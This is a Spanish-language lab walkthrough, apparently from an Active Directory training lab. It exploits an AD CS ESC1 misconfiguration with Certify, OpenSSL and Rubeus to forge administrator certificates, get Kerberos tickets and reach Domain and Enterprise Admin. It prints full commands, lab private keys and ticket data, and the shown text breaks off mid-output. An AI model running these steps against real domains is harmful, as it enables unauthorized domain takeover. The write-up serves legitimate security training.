# AD CS - ESC1 La plantilla "HTTPSCertificates" tiene el valor ENROLLEE\_SUPPLIES\_SUBJECT para msPKI-Certificates-Name-Flag. ``` PS C:\ad\tools\openssl> ..\Certify.exe find /enrolleeSuppliesSubject _____ _ _ __ / ____| | | (_)/ _| | | ___ _ __| |_ _| |_ _ _ | | / _ \ '__| __| | _| | | | | |___| __/ | | |_| | | | |_| | \_____\___|_| \__|_|_| \__, | __/ | |___./ v1.0.0 [*] Action: Find certificate templates [*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local' [*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA' Enterprise CA Name : moneycorp-MCORP-DC-CA DNS Hostname : mcorp-dc.moneycorp.local FullName : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED Cert SubjectName : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local Cert Thumbprint : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8 Cert Serial : 48D51C5ED50124AF43DB7A448BF68C49 Cert Start Date : 11/26/2022 1:59:16 AM Cert End Date : 11/26/2032 2:09:15 AM Cert Chain : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local [!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names! CA Permissions : Owner: BUILTIN\Administrators S-1-5-32-544 Access Rights Principal Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11 Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544 Allow ManageCA, ManageCertificates mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 Allow ManageCA, ManageCertificates mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 Enrollment Agent Restrictions : None Enabled certificate templates where users can supply a SAN: CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA Template Name : WebServer Schema Version : 1 Validity Period : 2 years Renewal Period : 6 weeks msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT mspki-enrollment-flag : NONE Authorized Signatures Required : 0 pkiextendedkeyusage : Server Authentication mspki-certificate-application-policy : Permissions Enrollment Permissions Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 Object Control Permissions Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA Template Name : SubCA Schema Version : 1 Validity Period : 5 years Renewal Period : 6 weeks msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT mspki-enrollment-flag : NONE Authorized Signatures Required : 0 pkiextendedkeyusage : mspki-certificate-application-policy : Permissions Enrollment Permissions Enrollment Rights : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 Object Control Permissions Owner : mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 WriteOwner Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 WriteDacl Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 WriteProperty Principals : mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 CA Name : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA Template Name : HTTPSCertificates Schema Version : 2 Validity Period : 10 years Renewal Period : 6 weeks msPKI-Certificates-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS Authorized Signatures Required : 0 pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email Permissions Enrollment Permissions Enrollment Rights : dcorp\RDPUsers S-1-5-21-719815819-3726368948-3917688648-1123 mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 Object Control Permissions Owner : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500 WriteOwner Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500 mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 WriteDacl Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500 mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 WriteProperty Principals : mcorp\Administrator S-1-5-21-335606122-960912869-3279953914-500 mcorp\Domain Admins S-1-5-21-335606122-960912869-3279953914-512 mcorp\Enterprise Admins S-1-5-21-335606122-960912869-3279953914-519 Certify completed in 00:00:22.2161427 ``` Para los usuarios del grupo RDPUsers como es nuestro usuario. Entonces, emitimos el certificado. ``` PS C:\ad\tools\openssl> ..\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:administrator _____ _ _ __ / ____| | | (_)/ _| | | ___ _ __| |_ _| |_ _ _ | | / _ \ '__| __| | _| | | | | |___| __/ | | |_| | | | |_| | \_____\___|_| \__|_|_| \__, | __/ | |___./ v1.0.0 [*] Action: Request a Certificates [*] Current user context : dcorp\student723 [*] No subject name specified, using current context as subject. [*] Template : HTTPSCertificates [*] Subject : CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local [*] AltName : administrator [*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA [*] CA Response : The certificate had been issued. [*] Request ID : 36 [*] cert.pem : -----BEGIN RSA PRIVATE KEY----- MIIEpQIBAAKCAQEA2XkO5Vi9IRx2P64CZyucBrDZkCSGfbS1zK+HbGmdRdQlTgnv wkb/VgCYfCRcbjmp/ykxajGv5poobwrqUvDi4kPUQJ+O1dntruV76s+T01z0Ecqx tffvzFfKsZ6GGlX3x9FRXjrXgmmNNNFWp6SnwwYxjvL7qGeU3moqqntehb+ww6pk VSUpnBuMQBtSv1rXIGu0+V3hJDMIUNPDkqsUOAphy18nyJSx7RvU7juS7NgIJZjK nHITGkxHs8sOuFa1sO3hO3gtgOPOBkYubSY7X6X1w7qvVMl9jt/VFT6V3vukBMwj 3FPqhC/LhkgYzh8GZCDyeeXRgboUlT/sFu4LrQIDAQABAoIBAQDOpgUslBUr2ILY 4f3wkXTyuqwSF1MhMk2qkYTq1LUYvI0ySajlgFdzHp/HHzohl3PdPgRxt4NBam1P jxy48aN2hCO1wKiWtz3u+qu0pcj/iI14NpaFpnLcRvQZsdwWPGh2HIXoN5u/lZMT hHSGWqT7YfBHuMa/8KV6b4HZe9+G0K54P6lAArHT3jPlo83o64dDcWiVja1XN/Ys GSHlsDmP+D7yo3BAOqqW4AoXXETkVqw7wYhYtNpxOQICXEhuvmlxk4VkaCMG0a3C x7/8/vbzCv7CRxOshznLlISdgMKD0sFgkbo4FL33JmfP8cS88QwuSsJicRt2gqsS nRsWJnSVAoGBAPP5cm8Gyo9/SUNEOrSFntgyHr/dNnjgKnGaVYYRJWweV/OiWKFB DoQpaDOnSxodhNCVarlcAXSHn4fIg9Abglji9v7HTpHmaPbEfC+0HYae1SsKEtQu VBwqf696ABsHbyocD3JJeT7Gs2aB4nifT3MBfTvO+DE1Vz+Gd6QdEcnfAoGBAOQx NLVpzD7mXZSaScx/cHrNOwe4P4R+uvvDp5c+0/dhZOvqB69po5NqAF/n0W4jzLal k97zdMdoyK596uJN9M7rnaB/DMPCBdhaSYzI6gor48npABxqNo7RNSruCLTXzGLP KMWDBg5YqsO6gdCUmnOMxXXeS3SeXPKCrWfurDPzAoGBAImI+MKwMGaemd1qzDFS Fk7ISl9cxEV2EVdDaq0OY2tE284DmjUlaJqGgTCFQagyNdokMSrXPBbGEd/I4M3j hCK5qAXOs3M6Ubey4lM+FVr7lS4TGrQ0fcP3DU4N15tlIHy7ntWNp+UEvMOvuszG +lHZ6BBcR7vt1wZ/tlh07r8/AoGAOCt0kgNM517FQkMIT3I/ObszAJ914yNe24I5 yp0IiChNM1UUNzWFsk+xb+ocP0RIq9zuHT9IS52baHhOTQ5raFPPJSag+b7UuYDg Aeui0IYlOBpGkLgEXftZXwvg0MMd6GSd4KBz6SwiPLO4KKOrsS3BnVXutPIWZwuL q72wXckCgYEAmpnpZ6pJsCFNJQjx7HcWXq82Bq0BeGtLaK80C8lbNAbJcEzWal3a GzA3ca92nXqWqWgjXCw/1P0ex3RrLIkISlU1O4Do58T8Kcl3PtYEoWkTwWFj+ojE KvBOiLtQApMTwDmsfjEheCstRWF7+YVWfQdOxDQm8Ii3Mo8wmTKpkuQ= -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIGYjCCBUqgAwIBAgITFQAAACT29zy+spiOtAAAAAAAJDANBgkqhkiG9w0BAQsF ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNDAzMDUw MzMwMTZaFw0yNjAzMDUwMzQwMTZaMHMxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEaMBgGCgmSJomT8ixkARkWCmRvbGxh cmNvcnAxDjAMBgNVBAMTBVVzZXJzMRMwEQYDVQQDEwpzdHVkZW50NzIzMIIBIjAN BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2XkO5Vi9IRx2P64CZyucBrDZkCSG fbS1zK+HbGmdRdQlTgnvwkb/VgCYfCRcbjmp/ykxajGv5poobwrqUvDi4kPUQJ+O 1dntruV76s+T01z0EcqxtffvzFfKsZ6GGlX3x9FRXjrXgmmNNNFWp6SnwwYxjvL7 qGeU3moqqntehb+ww6pkVSUpnBuMQBtSv1rXIGu0+V3hJDMIUNPDkqsUOAphy18n yJSx7RvU7juS7NgIJZjKnHITGkxHs8sOuFa1sO3hO3gtgOPOBkYubSY7X6X1w7qv VMl9jt/VFT6V3vukBMwj3FPqhC/LhkgYzh8GZCDyeeXRgboUlT/sFu4LrQIDAQAB o4IDDjCCAwowPQYJKwYBBAGCNxUHBDAwLgYmKwYBBAGCNxUIheGocofMn2jhhyaC n65RgvL2fYE/hpePdoe0hBICAWQCAQYwKQYDVR0lBCIwIAYIKwYBBQUHAwIGCCsG AQUFBwMEBgorBgEEAYI3CgMEMA4GA1UdDwEB/wQEAwIFoDA1BgkrBgEEAYI3FQoE KDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMEMAwGCisGAQQBgjcKAwQwRAYJKoZI hvcNAQkPBDcwNTAOBggqhkiG9w0DAgICAIAwDgYIKoZIhvcNAwQCAgCAMAcGBSsO AwIHMAoGCCqGSIb3DQMHMB0GA1UdDgQWBBQTWMeRA2EyvVtk6YcNAAgfhdvnvTAo BgNVHREEITAfoB0GCisGAQQBgjcUAgOgDwwNYWRtaW5pc3RyYXRvcjAfBgNVHSME GDAWgBTR/o0Kp/q0Mp82/CC498ueaMVF7TCB2AYDVR0fBIHQMIHNMIHKoIHHoIHE hoHBbGRhcDovLy9DTj1tb25leWNvcnAtTUNPUlAtREMtQ0EsQ049bWNvcnAtZGMs Q049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENO PUNvbmZpZ3VyYXRpb24sREM9bW9uZXljb3JwLERDPWxvY2FsP2NlcnRpZmljYXRl UmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Q b2ludDCBywYIKwYBBQUHAQEEgb4wgbswgbgGCCsGAQUFBzAChoGrbGRhcDovLy9D Tj1tb25leWNvcnAtTUNPUlAtREMtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUy MFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9bW9uZXlj b3JwLERDPWxvY2FsP2NBQ2VydGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0 aWZpY2F0aW9uQXV0aG9yaXR5MA0GCSqGSIb3DQEBCwUAA4IBAQCie2uXejB1PVIl e6RWt3eS83qM7sCITDvjrZtj3ZOAPlY85AqofRBFmT4bsdFPN/eQTYkcjJwDO0pK 9Xa8OvJgrT+Yl/7+zbZlLEDBGQo6WGlfxUZBYKwoUPnOY3oswl/fDKGL/4wyWNrd sq/820784GdKFHwz3uE4MMETES7Aw3D8nkqCPRr5GMlXKoWFso4KATNc/jC6DjAe vHQjgeOzt0w+DPOAX/WzcC4xQXtgwNXwRVWkGYxqAV7K+0CBZTzRcb1eh9O4yGBk aoczWcO+O9e7a7m7kGJbNvxtP/i4OcI9XLYjC0HNj4lvilGIWCSeR/4oNDSN8tXc tdjIRsT3 -----END CERTIFICATE----- [*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx ``` Comvertimos el fichero cert.pem en pfx. ``` PS C:\ad\tools\openssl> .\openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc1.pfx WARNING: can't open config file: /usr/local/ssl/openssl.cnf Enter Export Password: Verifying - Enter Export Password: PS C:\ad\tools\openssl> ``` Importamos el ticket. ``` PS C:\ad\tools\openssl> ..\Rubeus.exe asktgt /user:administrator /certificate:esc1.pfx /password:SecretPass@123 /ptt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.1 [*] Action: Ask TGT [*] Using PKINIT with etype rc4_hmac and subject: CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local [*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator' [*] Using domain controller: 172.16.2.1:88 [+] TGT request successful! [*] base64(ticket.kirbi): doIG4jCCBt6gAwIBBaEDAgEWooIFxjCCBcJhggW+MIIFuqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC BWIwggVeoAMCARKhAwIBAqKCBVAEggVMFiwCeA2ZBoadZv+EoxmDB3onWlo9wRNXkpIFYZavPbl6VJsL 0dr5QETddWeRpbGbC14qRPVnnXHYSLkzIQ9au8rzu1DHS3iZJNL0Mq45bQ8S2i9J9F25L/BeET7pGRSN iviXh+evqFXZrSyzucO1Gu9n6L0i5reX+KpE2qLNP6dGKs0EExMFe1/DnY+pgqsu37+9yztzBieiiPNu T9YAaLYze1affSqHLrd7/PiSQZ0b9VOXkJDUaP/gU1uwl6eLq6zN5liShl554aEiz/AkE+kx6i5aw0ar i09U/ThRKbnnjkPbGj7Klqc84qFFfrWFir/jVE2Rhz7Hs6z4JsgvOIQyWq3LIK26Y854HNQh0ET9jVkh 01UL760GgLcH9GOATcTiWJjjkq+YnhG9yWtzMEUFMNwLzfxqRI3EhO4vpPqgO6CYG0GMsz+eom5vxE7a gXYWmZdr7mrDNnjOTPyROEZ5GxRJSR5E2p5eRwNSKizx2WfqnVmT0HNtOdrep8IQK0bIckgtrbSULy2b oTIsIcA+IqsDegg4KyCZO47tr1ixG5YgfhY4B2MAIX57MxVNEMDGTd56VjI4xQaBCvv1QOIYNIlpZmxn ZsiFckeF2bZ1bPliPePNjre0rTmsXz/mroZQ4uIDbzmZ9pY0jid8rAvlCfUBJC3jbrZEV1BiJHXzFXvw NJ7b48/j768esFFWXxaiFCDR5lDn64SGzixhXL6+7gRn9HxdROcPrM3xd6X9nfG6/YYZUWZvOTrh5YBQ lxTGmPtLCjnhhu1FR2kf+P+7wz0eUGec/qLd0wPJujXQChAjV/3NPEjThO1Mwryr9xmH46ECDldiB/oz gjZfSk9kvVIWfuOQ4Dg9Ro0k2AQpEJkBK23eHeY8I+0/rZv+RmjuRViiJ1GXV63D294fEUsMLHeN/n9d MfOt4PFEMjODt2DB5MnWriEngnc0b/hlEh+i5q6b1fjrHMb254x0H1lHulvCG7zPi7IeuNgdFwDIWNQv PV2M69HIYKYgEIOpJkRDRzs44maawhfPFRss1ftMbFz0XyHYiXH+dgG7Fa2YcUqd2PWcYT3jzglIdiDa eFT7p0qaiIw3dVy8e9PaXt9xcV72CMyLDye7Q1bZVeV8snK5Ln0MalFA9lHawPtBLfFeWIBwn8ToxxwH 3LbZ60iERKSIojoDhSdyv2RTnqtDwGPyuAcY7AX6+iPPBOm4K2cyyvQoBBhNoxVYklqGrLbwPv9p5QSo 24YnXDg42Oku/0D9TD5Cluv1NCSLRjmhpVL8U4VoGLgtVoQzg2mwmTPHPAowU9agVzYIZThzeIGu++X5 GrfRUXskq3RIs5RkxX1fFUQJhefdq0m+nwu6uKbmc8fAbhhDVYY4zJdyYjC/HDnvDnZsY8MU15UsaZmP NCY1nR7hAIqFAG5wImnBeeaNYiE9/da9/kq68KlJBlfpPDdb+e4Ud4lHhWsuc0gVQnMk3FRKmXef7yPn LCIeS6Q5W6GpPcR1C+ZC3DSw5/oLZsM/lDj9QTtOrxhGBfo20w5wpwt8uIqCZiLOvZhTdsUC7HzhyHsN 9K0soWPGXMKKnRid7mEsydIjf46m3RWRAUzKBKnv/uKN59HDSWifTxfF/PP+jq4L9d9jrEh83TO8rH4O XGFd2HBHouqakimUkOwZ+IabohegVK/tVP/CwT6ZZ8uS2ksj6+j22p1fEGkaXC2qvmyrVhmDfueLhKpL BUo6bJXPBSrvipvW4XibB3LVNpzi38T6KQtJ+Q0sjhzeuoWUPDnvSw5N4m2X9QrWuJKt6lzAOaUk/eiC o4IBBjCCAQKgAwIBAKKB+gSB932B9DCB8aCB7jCB6zCB6KAbMBmgAwIBF6ESBBDW8Qz8MtjnfZFZKGLk lHJ4oRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMohowGKADAgEBoREwDxsNYWRtaW5pc3RyYXRv cqMHAwUAQOEAAKURGA8yMDI0MDMwNTAzNDQzOFqmERgPMjAyNDAzMDUxMzQ0MzhapxEYDzIwMjQwMzEy MDM0NDM4WqgcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKkvMC2gAwIBAqEmMCQbBmtyYnRndBsa ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWw= [+] Ticket successfully imported! ServiceName : krbtgt/dollarcorp.moneycorp.local ServiceRealm : DOLLARCORP.MONEYCORP.LOCAL UserName : administrator UserRealm : DOLLARCORP.MONEYCORP.LOCAL StartTime : 3/4/2024 7:44:38 PM EndTime : 3/5/2024 5:44:38 AM RenewTill : 3/11/2024 8:44:38 PM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : 1vEM/DLY532RWShi5JRyeA== ASREP (key) : 5E2FB1414E1E60853B74A0BBB8A03063 PS C:\ad\tools\openssl> ``` Comprobamos los privilegios. ``` PS C:\ad\tools\openssl> ls \\dcorp-dc\C$ Directory: \\dcorp-dc\C$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 5/8/2021 1:20 AM PerfLogs d-r--- 11/14/2022 10:12 PM Program Files d----- 5/8/2021 2:40 AM Program Files (x86) d-r--- 3/4/2024 7:33 AM Users d----- 1/10/2024 12:59 AM Windows ``` ## Ahora a Enterprise Admin Solicitamos el ticket. ``` C:\AD\Tools\openssl>..\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:"HTTPSCertificates" /altname:moneycorp.local\administrator _____ _ _ __ / ____| | | (_)/ _| | | ___ _ __| |_ _| |_ _ _ | | / _ \ '__| __| | _| | | | | |___| __/ | | |_| | | | |_| | \_____\___|_| \__|_|_| \__, | __/ | |___./ v1.0.0 [*] Action: Request a Certificates [*] Current user context : dcorp\student723 [*] No subject name specified, using current context as subject. [*] Template : HTTPSCertificates [*] Subject : CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local [*] AltName : moneycorp.local\administrator [*] Certificate Authority : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA [*] CA Response : The certificate had been issued. [*] Request ID : 41 [*] cert.pem : -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAvdDIc2ojtCVWp8qoIIB4i5X3fBmPLfwjRi/lL8tDwNTEiz1p aSUZu/RxxePX4nCPfIrWqwsKaQ2jqvf4lXKPTDbTWD7zJqgQB3tMglpIixw57s8r fqcuwHVkF5AGiFuAQ02JVM6UNrAbMNdl2Nlvo7oXESLg1O7ipjKosuGcrqzwj8dj mYHh7iLTjEr2SRDgfRWT+Sgh5qkXFbCdvhssguZf+d68hpsG+UCDH0sld991GFuw uf7rJOJG/gzba4LxeQeBHElGyy0RpatfxBqTMyElDW6F2Oa0g3rYxv+VLOyEM6bQ KRqplaGH1SLXp4msHZzr7m6aqmN3WF6JBju+bQIDAQABAoIBAFZyOohNo3sMsj1y j0VWHRA9OVv8a/feZ9Y0Q+WTZgTxIZ3kVxh6vBCckCA21wAakU6AEKoPOiuD+bEI g97UMKzeHzyGVsiZK8usfLi1E2q/bSb0lPN2glVGYVJV1pPNUEnWix/jgR6y7387 6fdrd2uSeaTlRI3VScW1Np1ZILlv4rBa8aKGpQ3grFxHUbo+DMjOlRShLYrTK7nt tS2YeDxHC+cDsIExdAcwvtReIgnedjGtz5qTiQBsEAvCybZa5CX2iuPY8kRDPTPc eNxJEPDVoaByvRnHzWWZ6BgKA2zuZGjzs8JDpFr7/mrnk8x94G76Ww/U2c54WnFG xa/UxQUCgYEA43NBc+zepQpDuZ1ZPUHYm2XlAGKV9Lt1FYZH6Jt6jzaPv/29rOE6 npN1v/08NlbFJ3vN5z7fX51W6MXt9OP4XtDxyfuZrtFft5SpSn0JyBun7/rOJ7U2 hlq7GJFkXvxHrrSFKzsVG6P+HwnmXzxaeTxEiPh/3XSyZ6MmJXC/tU8CgYEA1aQy 0w6lP5z3ljllYEJcU+MkEnVd7pcjuNn5cd8I087EfulBJu8Lo38qO8b4WOBF3Zf9 pZdVAEFZXBOTQMjpHRm1QA6vHMOoyKQoxKNUcFR1zFrD3REuASbcBgKWw8fm9dZ6 um7LY1PeWyyjNYrp7B7hBxKmPXxZJaa273zu2YMCgYEApIoSRXyLrDT6vWI41nm1 6uURfu/Sr1KU5tdXWcxwIv5Di45SEqh0sZbXTeYyEtU+lsuXLrxq905pOsdE1y27 1UuuPoIGsVLBvZqLxVkjJGHtYUu8qzkKkrM8Og+j3pr+eEIbPCTnpjFCes28nBSb Fq0knzm1tkzfat25kMg5xz0CgYEAzm8Q5Tu7lVI5MqFXQcIdsLlEe8mI8Ch+zflh vRREVVXwLKl62QIW/u67gnNqOYbMO6jH4R/vdIWwsPYBTZJVHlde+fy2XFb7WpS1 B/zCdKBICySRKaWWDGreI7iQsbERjO6oPEkeomXB79ucAPqvugbEba8pjzP+eBE1 pwfTS70CgYBV1I41aWEbQ+uFeMu4FgFSHkNZkr0T4YtpWbZsG3SJh0EDFlR2FDOG OROIKhSlDqLhRVB8EHRq9YNbnfbxPx3UzK9cB1Qy4an2YbvSqWR67e44VnWepxJg qARw7mR/VM1a9DQdNC+QvL3tLtShNAG9Ouv6FxwyZUKuDRSHyOIcTQ== -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIGcjCCBVqgAwIBAgITFQAAACkrjprXHSMJRQAAAAAAKTANBgkqhkiG9w0BAQsF ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNDAzMDUw MzQ4MDRaFw0yNjAzMDUwMzU4MDRaMHMxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEaMBgGCgmSJomT8ixkARkWCmRvbGxh cmNvcnAxDjAMBgNVBAMTBVVzZXJzMRMwEQYDVQQDEwpzdHVkZW50NzIzMIIBIjAN BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvdDIc2ojtCVWp8qoIIB4i5X3fBmP LfwjRi/lL8tDwNTEiz1paSUZu/RxxePX4nCPfIrWqwsKaQ2jqvf4lXKPTDbTWD7z JqgQB3tMglpIixw57s8rfqcuwHVkF5AGiFuAQ02JVM6UNrAbMNdl2Nlvo7oXESLg 1O7ipjKosuGcrqzwj8djmYHh7iLTjEr2SRDgfRWT+Sgh5qkXFbCdvhssguZf+d68 hpsG+UCDH0sld991GFuwuf7rJOJG/gzba4LxeQeBHElGyy0RpatfxBqTMyElDW6F 2Oa0g3rYxv+VLOyEM6bQKRqplaGH1SLXp4msHZzr7m6aqmN3WF6JBju+bQIDAQAB o4IDHjCCAxowPQYJKwYBBAGCNxUHBDAwLgYmKwYBBAGCNxUIheGocofMn2jhhyaC n65RgvL2fYE/hpePdoe0hBICAWQCAQYwKQYDVR0lBCIwIAYIKwYBBQUHAwIGCCsG AQUFBwMEBgorBgEEAYI3CgMEMA4GA1UdDwEB/wQEAwIFoDA1BgkrBgEEAYI3FQoE KDAmMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMEMAwGCisGAQQBgjcKAwQwRAYJKoZI hvcNAQkPBDcwNTAOBggqhkiG9w0DAgICAIAwDgYIKoZIhvcNAwQCAgCAMAcGBSsO AwIHMAoGCCqGSIb3DQMHMB0GA1UdDgQWBBS5oLc86K6x6Hl5GdRieHQbab3cvTA4 BgNVHREEMTAvoC0GCisGAQQBgjcUAgOgHwwdbW9uZXljb3JwLmxvY2FsXGFkbWlu aXN0cmF0b3IwHwYDVR0jBBgwFoAU0f6NCqf6tDKfNvwguPfLnmjFRe0wgdgGA1Ud HwSB0DCBzTCByqCBx6CBxIaBwWxkYXA6Ly8vQ049bW9uZXljb3JwLU1DT1JQLURD LUNBLENOPW1jb3JwLWRjLENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNl cyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPW1vbmV5Y29ycCxEQz1s b2NhbD9jZXJ0aWZpY2F0ZVJldm9jYXRpb25MaXN0P2Jhc2U/b2JqZWN0Q2xhc3M9 Y1JMRGlzdHJpYnV0aW9uUG9pbnQwgcsGCCsGAQUFBwEBBIG+MIG7MIG4BggrBgEF BQcwAoaBq2xkYXA6Ly8vQ049bW9uZXljb3JwLU1DT1JQLURDLUNBLENOPUFJQSxD Tj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1 cmF0aW9uLERDPW1vbmV5Y29ycCxEQz1sb2NhbD9jQUNlcnRpZmljYXRlP2Jhc2U/ b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTANBgkqhkiG9w0BAQsF AAOCAQEAwY2cmph+2qywOsf/K1UKnHCEmZY+PC9zkYO2g1YLx4cxnb9+c08xPKEH d3TPHNUleGpTngfMXvDyYlY0XNV6nLytPfqVEPy89CmukMSB1PTYZAUJSE9tcJFg 6BEo1ZwXwoRO8bHFFSdOXN1z5/ybHbALXtJSsNw3oMEtJyd8bsdjU+dVghzh3YlT JHD1IVGMVp6PB6PL/QTqbtdQZbf9PBagdu7jhE8uYO505Nws/HreXKsq5ZgNOhHG 1ut5W4YAmX1U+WAjFMOafngugVS8U7fmZ33V3uO0oifey3XQXlxhdrzdPh/x6+tx gRhJodM+bJabtOwG1Rz8YK1FA6t4AA== -----END CERTIFICATE----- [*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx Certify completed in 00:00:11.6746787 C:\AD\Tools\openssl> ``` Cambiamos el cert.pem por .pfx. ``` C:\AD\Tools\openssl>.\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc1.pfx WARNING: can't open config file: /usr/local/ssl/openssl.cnf Enter Export Password: Verifying - Enter Export Password: ``` Y ahora lo cargamos usando rubeus. ``` C:\AD\Tools\openssl>..\Rubeus.exe asktgt /user:moneycorp.local\administrator /certificate:esc1.pfx /password:SecretPass@123 /ptt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.1 [*] Action: Ask TGT [*] Using PKINIT with etype rc4_hmac and subject: CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local [*] Building 